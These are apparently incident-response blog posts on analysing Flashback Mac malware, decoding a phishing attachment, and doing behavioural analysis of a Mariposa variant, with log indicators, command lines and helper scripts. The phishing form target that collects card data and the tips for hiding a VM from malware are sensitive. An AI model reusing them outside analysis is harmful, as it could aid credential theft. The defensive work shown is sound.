Flashback is Mac malware that has recently been showing up with a vengeance. The latest version, .K, is exploiting a newly patched Java vulnerability on OS X. F-Secure recently posted about detecting and removing it from a system. In this post, I’ll cover some additional artifacts found on an infected machine and include a script to remove it.
When responding to an infected system, I noticed that /var/log/secure.log included a couple of indicators of infection. The indicators below may help you detect infected users if you are using syslog for your OS X devices. Seeing “/bin/sh” followed by “suppressing keychain prompt” within a couple of minutes of each other has been a solid indicator in the log. On the systems I looked through, the suppressing keychain prompt message did not show up in a year’s worth of logs until after infection.
Mar 31 14:17:32 K-MacBook-Pro com.apple.SecurityServer: UID 501 authenticated as user k (UID 501) for right ‘system.privilege.admin’
Mar 31 14:17:32 K-MacBook-Pro com.apple.SecurityServer: Succeeded authorizing right ‘system.privilege.admin’ by client ‘/private/tmp/Software Update’ for authorization created by ‘/private/tmp/Software Update’
Mar 31 14:17:32 K-MacBook-Pro com.apple.SecurityServer: Succeeded authorizing right ‘system.privilege.admin’ by client ‘/usr/libexec/security_authtrampoline’ for authorization created by ‘/private/tmp/Software Update’
Mar 31 14:17:32 K-MacBook-Pro authexec: executing /bin/sh
Mar 31 14:19:55 K-MacBook com.apple.SecurityServer: suppressing keychain prompt for invalidly signed client /Applications/Safari.app(658)
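The correlation described above can be run over centrally collected syslog. This is an added example, not the removal script from this post; the host names and sample lines are constructed, and the five-minute window and the year are assumptions you can change.

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines modelled on the secure.log entries above (not real logs).
SAMPLE_LOG = """\
Mar 31 14:17:32 host-a authexec: executing /bin/sh
Mar 31 14:19:55 host-a com.apple.SecurityServer: suppressing keychain prompt for invalidly signed client /Applications/Safari.app(658)
Mar 31 15:02:10 host-b authexec: executing /bin/sh
Mar 31 16:40:00 host-b com.apple.SecurityServer: suppressing keychain prompt for invalidly signed client /Applications/Safari.app(301)
Apr  1 09:00:00 host-c com.apple.SecurityServer: suppressing keychain prompt for invalidly signed client /Applications/Safari.app(77)
"""

LINE_RE = re.compile(r"^(\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+(\S+)\s+(.*)$")


def parse_time(stamp, year):
    # Classic syslog timestamps carry no year, so the caller supplies one.
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")


def find_flashback_indicators(text, window=timedelta(minutes=5), year=2012):
    """Return (host, shell_time, keychain_time) where both indicators
    appear on the same host, in order, within the window."""
    last_shell = {}  # host -> time of the most recent "executing /bin/sh"
    hits = []
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue
        stamp, host, message = match.groups()
        when = parse_time(stamp, year)
        if "authexec: executing /bin/sh" in message:
            last_shell[host] = when
        elif "suppressing keychain prompt" in message:
            started = last_shell.get(host)
            if started is not None and timedelta(0) <= when - started <= window:
                hits.append((host, started, when))
    return hits


if __name__ == "__main__":
    for host, started, seen in find_flashback_indicators(SAMPLE_LOG):
        print(f"{host}: /bin/sh at {started}, keychain prompt suppressed at {seen}")
```

The keychain message on its own (host-c in the sample) is not reported; only the pair on one host is.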
I also collected file system MAC times on the infected machine. You can see the malware files .QUICKHEALXGEN.png and .QUICKHEALXGEN.xsl being created. Additionally, you can see that chmod and mv were accessed. This matches up with the F-Secure analysis.
2012 Mar 31 Sat 14:17:32
102 m.c. drwxr-xr-x 0 0 0 /Applications/Safari.app
374 m.c. drwxr-xr-x 0 0 0 /Applications/Safari.app/Contents
4643 m.c. -rw-rw-rw- 501 20 0 /Applications/Safari.app/Contents/Info.plist
20400 m.c. drwxr-xr-x 0 0 0 /Applications/Safari.app/Contents/Resources
403744 m... -rwxrwxrwx 501 0 0 /Applications/Safari.app/Contents/Resources/.QUICKHEALXGEN.png
26168 m... -rwxrwxrwx 501 0 0 /Applications/Safari.app/Contents/Resources/.QUICKHEALXGEN.xsl
62656 .a.. -r-xr-xr-x 0 0 0 /bin/chmod
44848 .a.. -r-xr-xr-x 0 0 0 /bin/mv
Submitting the malware to VirusTotal had poor results, with only 8 out of 42 detecting it as of April 4th.
This script has several components: it checks for both types of infection discussed by F-Secure, backs up a copy of the two plist files and names them .infected, asks the user whether to clean the infection, and also prompts the user to disable Java in Safari. While I have tested this script on the cleanup of the Safari Info.plist, I have not seen an infection of the environment.plist. The cleanup should work, but please test it before you use it. I will not be held liable for any problems.
I have built in a simple update function that will check for a new version using the -u switch at the command line. If a new outbreak happens, I’ll try and keep it updated. You can submit bug fixes to the blog or to the email address in the script.
To run the program, unzip the download below and double-click on the flashback-detect.command file. It will prompt you for your password and check to see if you’re infected. You can also run it from Terminal using flashback-detect.sh.
Get the script HERE.
My goal, when performing analysis on phishing emails, is to get the URL out of the code, report it, and block it.
Typical Phishing Email.
For security reasons, your card was blocked.
Following an abnormal activity, we saw that someone used the card without
your permission, so to protect you, we blocked the card.
Once you have reactivated your Visa Card records, your card service will
not be interrupted and will continue as normal.
To reactivate your Visa Card download and complete the form attached to
Note: Failure to verify your records will result in card suspension.
Visa will periodically send you information about site changes and
© Copyright 2001-2011 Visa. All Rights Reserved
File attached to email
In this case, the file was an HTML attachment to the email. I saved the file and opened it in a text editor. If I had to follow a link to a phishing site, I would have downloaded the page using TOR and a wget script.
To convert it to ASCII, remove everything up to the first single quote. The file should then begin with the % character. I did this using the Linux cut command and saved the result as complete-document.htm
# cat html.txt | cut -d "'" -f2 > complete-document.htm
Now that we have just the hex-encoded part of the HTML, we are going to use the command-line tool xxd to convert it.
#cat complete-document.htm |xxd -r -p |less
Verified by Visa.. (truncated)...
That is it as far as decoding the file, but that is just the start of your Incident response process.
Within the decode, you should see either additional links for the victim to follow, or a web form that uses a POST to a website. In this case, you can grep for the words post and get to find out where this data is going.
# cat complete-document.htm | cut -d "'" -f2 | xxd -r -p | egrep -i 'post|get'
form name="run.php" action="http://compromised-host.com/imicommerce/images/music/sample/.m/q.php" method="POST" onSubmit="return OnMultiSubmitHandler(optinLang)
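The same decode-and-extract step can be scripted so that the form target comes out ready for a report and a block list. This is an added example, not part of the original post; the attachment is constructed, phish.example is a placeholder domain, and it assumes the attachment wraps its %XX-encoded HTML in quotes as described above.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit


def _percent_encode(text):
    """Used only to build the constructed sample: every byte as %XX."""
    return "".join(f"%{b:02X}" for b in text.encode("latin-1"))


# Constructed attachment in the style described above; not the real phish.
SAMPLE_ATTACHMENT = (
    "<script>document.write(unescape('"
    + _percent_encode('<form name="f" action="http://phish.example/q.php" '
                      'method="POST"><input name="card"></form>')
    + "'));</script>"
)


class FormFinder(HTMLParser):
    """Collect (method, action) for every <form> start tag."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            a = dict(attrs)
            self.forms.append(((a.get("method") or "GET").upper(), a.get("action") or ""))


def decode_attachment(raw):
    """Decode each quoted run of %XX escapes (JavaScript unescape() yields Latin-1)."""
    runs = re.findall(r"""['"]((?:%[0-9A-Fa-f]{2})+)['"]""", raw)
    return "".join(unquote(r, encoding="latin-1") for r in runs) or raw


def form_targets(raw):
    finder = FormFinder()
    finder.feed(decode_attachment(raw))
    finder.close()
    return finder.forms


def defang(url):
    """Rewrite a URL so it cannot be clicked by accident in a report or ticket."""
    p = urlsplit(url)
    return f"{p.scheme.replace('tt', 'xx')}://{p.netloc.replace('.', '[.]')}{p.path}"


if __name__ == "__main__":
    for method, action in form_targets(SAMPLE_ATTACHMENT):
        print(method, defang(action), "block:", urlsplit(action).hostname)
```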
Now that you have the URL, you will need to determine if any systems on your network sent information to the website. You should check logs from your DNS servers, firewall, network flows, web proxy servers and any other network intelligence sources to determine if any users accessed the site.
- Any system that accessed the site may possibly have malware on it.
- If the phish is targeting credentials, the user account should be locked and the user forced to reset passwords.
- If the user entered banking information they will need to notify the bank ASAP.
Report the site as compromised to the contact listed in its whois information and to the security contact of the organization the phishing email is targeting, and add it to PhishTank.
If you have a dns blacklist server or web proxy add the domain to the block list. Be careful if this site is part of a larger site as you will be blocking access to the entire domain.
Sometimes as an incident responder we get called on to analyze a system that has already been “looked at” by another admin or desktop support personnel. Most of the time, I tell them the evidence has been trampled on by different malware scanning software and just re-image the system. But sometimes you may need to do analysis on the system.
In this instance, a number of different malware products had been run, along with clearing temp files and Internet cache, but the system was still showing signs of infection. After building a timeline, I was able to determine that the initial infection vector had been deleted and the malware hosting site had been pulled off-line. The system had a nasty rootkit that was injecting code into a couple of processes. I didn’t have time to run it through OllyDbg or IDA Pro.
I needed a quick way of determining the capabilities of the malware, so I decided to boot a copy of the original dd image using VMware and then do behavioral analysis on the system. I could have used software such as Live View, but I wasn’t sure how well it worked with Linux as my host OS. Harlan Carvey did a great post in 2007 about booting a dd image using VMware, and I wanted to turn that idea into a procedure.
1. Make sure you are using a backup copy of the dd image, as this will make changes to the image file.
2. Launch ProDiscover Basic.
a. Select -> Image convert tools -> VMware support for DD Images
3. Select the dd file.
4. In the same folder as the dd file, it will create a .vmdk file.
5. Create a new virtual machine. Use the wizard and select typical machine, install OS later and Guest OS, and take the default settings on all the rest.
6. Select VM Settings. Under VMware 7.0, choose the VM menu -> Settings.
7. Remove the default hard drive.
8. Select Add -> Hard disk, then Next.
9. Select use existing virtual disk. Browse to the new vmdk file created.
10. Boot the VM.
11. Use the process described in a previous post to determine what the malware is doing. Make sure that you use the applications that you are worried about the malware interacting with. For example, if you are worried about web-based credential-stealing malware, try logging into sites like eBay, Citibank and maybe a custom app from your company. Make sure you are using fake credentials if you do not want to potentially leak real ones.
Dark Reading just recently had a post on a Java-based command line tool for doing this. I have yet to use it, but it may be worth checking out.
Lately I’ve been running into malware that doesn’t play nicely with analysis websites like CWSandbox or Norman. I needed to find indicators of infection for a Mariposa variant and both sites would not analyze it. It appears that it needs the presence of both the .exe and its specially crafted desktop.ini before it will execute. Since you can only submit one file to these websites, I needed to do the analysis on my own. When doing this type of analysis, we are just looking at the changes it made to the system and not specifically determining the capabilities of the software.
The first thing you need to do is make sure you have a system that mirrors your environment; this is easier if you have a standard desktop build. When possible I try to use VMware for my analysis machine. Depending on the malware, this may not work. I’ve had good results with uninstalling VMware Tools, after which malware did not detect that it was running in a VM. One of the easier ways for malware to detect a VM environment is checking for VMware Tools and its drivers. Removing them may also help prevent a VMware exploit, as many of these exploits use VMware Tools to accomplish this.
Once you have removed VMware Tools, you will want to install any tool that you will use for analysis. I’m going to cover Process Monitor today as it’s quick and easy for what I was trying to do. Once your tools are installed, take a snapshot of the system. If you are going to let your malware actually connect to the Internet to pull down secondary tools, it’s a good idea to use TOR or, better yet, use a different Internet pipe rather than your corporate network. You could also use a sandnet like TRUMAN, but that is out of scope for this post.
Capturing network traffic can also be useful in tracking down infections. Process Monitor also keeps track of network connections, but I like to do this on the host rather than the guest for a couple of reasons:
- Prevents malware detecting the network card in promiscuous mode.
- Smaller footprint on the machine.
1. Start your network packet capture tool. I like to set the capture interface to the guest virtual NIC, but on most systems the primary interface will capture all the traffic.
tcpdump -nni eth1 host 192.168.1.1 -w infection.pcap
-nn (tells tcpdump not to convert addresses and ports to names)
-i eth1 (the interface I want to capture traffic from)
host 192.168.1.1 (capture all traffic to and from the VM's IP address)
-w (write the capture to a file)
2. Start Process Monitor
It will automatically start collecting data.
3. Run Malware
Depending on the malware, it will have multiple stages that may take a while for the infection to be completed.
4. Stop tcpdump and Process Monitor (3rd button from Left or CTRL+E). Disable the Network Card from the VM or Pull the network cable.
We want to setup display filters to determine what files and registry keys were created.
Click on the filter button. (Or Ctrl + L)
The top row has a bunch of drop-down menus that allows you to select what you want to filter.
Select Operation from the first Column.
Select each of the keys individually below and click add. Additionally, you can export the data into csv format and do filtering using a spreadsheet.
(UPDATE) Additional filters to add, based on this post: setbasicinformation, setdispositioninformationfile, regdeletekey, regdeletevalue, regcreatekey
To get a better look at what processes the malware spawned you can add these to the filter:
Partial list of files that were written during infection by this version of Mariposa.
Partial list of registry keys that were written during infection by this version of Mariposa.
When trying to find indicators of infection, you generally want to look for ways the malware stays persistent on the machine. This malware variant adds an executable file in the recycle bin to start-up at winlogin.
You may need to infect your VM a couple of times to get enough information about how it’s randomizing its name. Now you can take this info and add it to a HIPS like OSSEC or a script to query all your computers in a domain.
For /f %i in (computers.txt) do Reg query "\\%i\hklm\software\microsoft\Windows NT\CurrentVersion\winlogon" /v taskman >>winlogonreg.txt
Here computers.txt stands for the file that lists the computers to search, one per line, and >> appends each computer's result instead of overwriting the file. Then you can search the results file (winlogonreg.txt) for any computer that has Recycler in it, as no valid item should start from Recycler when you log into the system.
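For the CSV export route mentioned earlier, the filtering can be scripted instead of done in a spreadsheet. This is an added example, not from the original post: the rows are constructed, the column names are assumed to be Process Monitor's defaults, and the operation set is the UPDATE list above (spelled as Process Monitor displays them) plus WriteFile and RegSetValue as assumed additions.

```python
import csv
import io

# Constructed Process Monitor CSV export (default column names assumed);
# process names and paths are illustrative, not data from the original analysis.
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"2:01:10 PM","sample.exe","1204","WriteFile","C:\RECYCLER\S-1-5-21-0000\example.exe","SUCCESS","Offset: 0, Length: 4,096"
"2:01:10 PM","sample.exe","1204","RegSetValue","HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Taskman","SUCCESS","Type: REG_SZ, Length: 80, Data: C:\RECYCLER\S-1-5-21-0000\example.exe"
"2:01:11 PM","explorer.exe","1500","RegQueryValue","HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","SUCCESS","Type: REG_SZ, Length: 26, Data: Explorer.exe"
"2:01:12 PM","svchost.exe","880","RegSetValue","HKLM\SOFTWARE\Example\Setting","ACCESS DENIED",""
"2:01:13 PM","sample.exe","1204","SetDispositionInformationFile","C:\Temp\dropper.tmp","SUCCESS","Delete: True"
'''

# Operations that create, change or delete files and registry data.
CHANGE_OPS = {
    "writefile", "regsetvalue", "regcreatekey", "regdeletekey", "regdeletevalue",
    "setdispositioninformationfile", "setbasicinformationfile",
}


def system_changes(csv_text):
    """Rows for successful operations that changed the file system or registry."""
    rows = csv.DictReader(io.StringIO(csv_text))
    return [r for r in rows
            if r["Operation"].lower() in CHANGE_OPS and r["Result"] == "SUCCESS"]


def winlogon_recycler_hits(csv_text):
    """Winlogon Taskman values that point into the recycle bin."""
    return [r for r in system_changes(csv_text)
            if r["Operation"] == "RegSetValue"
            and r["Path"].lower().endswith(r"\winlogon\taskman")
            and "recycler" in r["Detail"].lower()]


if __name__ == "__main__":
    for row in system_changes(SAMPLE_CSV):
        print(row["Process Name"], row["Operation"], row["Path"])
    for row in winlogon_recycler_hits(SAMPLE_CSV):
        print("PERSISTENCE:", row["Process Name"], row["Detail"])
```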
Once analysis is completed, be sure to revert your VM back to the snapshot before the infection.
With the pcap file you created, you’ll want to analyze it using Wireshark or tcpdump. There are a couple of quick things you will want to look for:
- DNS lookups (This will allow you to search your DNS logs for anyone querying the same DNS records as your infected VM).
- Data exfiltration traffic (Most malware these days sends the information it collects back to some type of command or data collection server.).
- Track down infected hosts using flows or firewall logs based on identified traffic.
- If you are comfortable with writing IDS rules, writing rules for this traffic will also help pick up future infections once the other servers are taken offline.